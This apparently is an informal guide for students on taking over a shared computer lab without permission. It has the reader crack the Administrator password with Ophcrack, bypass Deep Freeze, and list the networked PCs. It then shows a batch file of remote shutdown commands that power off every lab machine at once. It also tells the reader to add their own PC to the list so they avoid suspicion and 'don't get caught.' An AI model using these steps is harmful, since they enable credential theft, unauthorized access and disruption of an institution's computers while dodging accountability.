Be carefull while doing all these steps, and make sure to remember auditing software on those PCs. If they use Deep Freeze, well just unplug the cable for the first step, then restart the PC.

The first step is to obtain the Administrator password of a machine.
>> Download Ophcrack (for windows) and put the installed application on a flash drive. Then run it on the PC, and you will have the password in less than 30 minutes.


http://sourceforge.net/project/showfiles.php?group_id=133599

Once you have the Admin password, you can a lot of things. But what if they use Deep Freeze, and you need it to be disabled? Well, you are lucky, problem solved.


http://usuarios.arnet.com.ar/fliamarconato/pages/emain.html

Now let's have some fun. Let's shutdown all computers (WinXP only) in the lab or network.
First run "net view > c:\list.txt" to list all the PCs in your network.
Then you can use the following command to shutdown a remote PC, running CMD with the Admin priviledges. cmd /c shutdown -s -t 00 -m \\PCNAME

Run notepad, Save as, shut.bat
in the file you should have something like this


cmd /c shutdown -s -t 00 -m \\LABE20301
cmd /c shutdown -s -t 00 -m \\LABE20302
cmd /c shutdown -s -t 00 -m \\LABE20303
cmd /c shutdown -s -t 00 -m \\LABE20304
cmd /c shutdown -s -t 00 -m \\LABE20305
cmd /c shutdown -s -t 00 -m \\LABE20306
cmd /c shutdown -s -t 00 -m \\LABE20307
cmd /c shutdown -s -t 00 -m \\LABE20308
cmd /c shutdown -s -t 00 -m \\LABE20309
cmd /c shutdown -s -t 00 -m \\LABE20310
cmd /c shutdown -s -t 00 -m \\LABE20311
cmd /c shutdown -s -t 00 -m \\LABE20312
cmd /c shutdown -s -t 00 -m \\LABE20313

The computer names will be differnet of course
For the final step, remember to add your own PC in the last line, that way they won't question you.

Try it out, have fun, and don't get caught.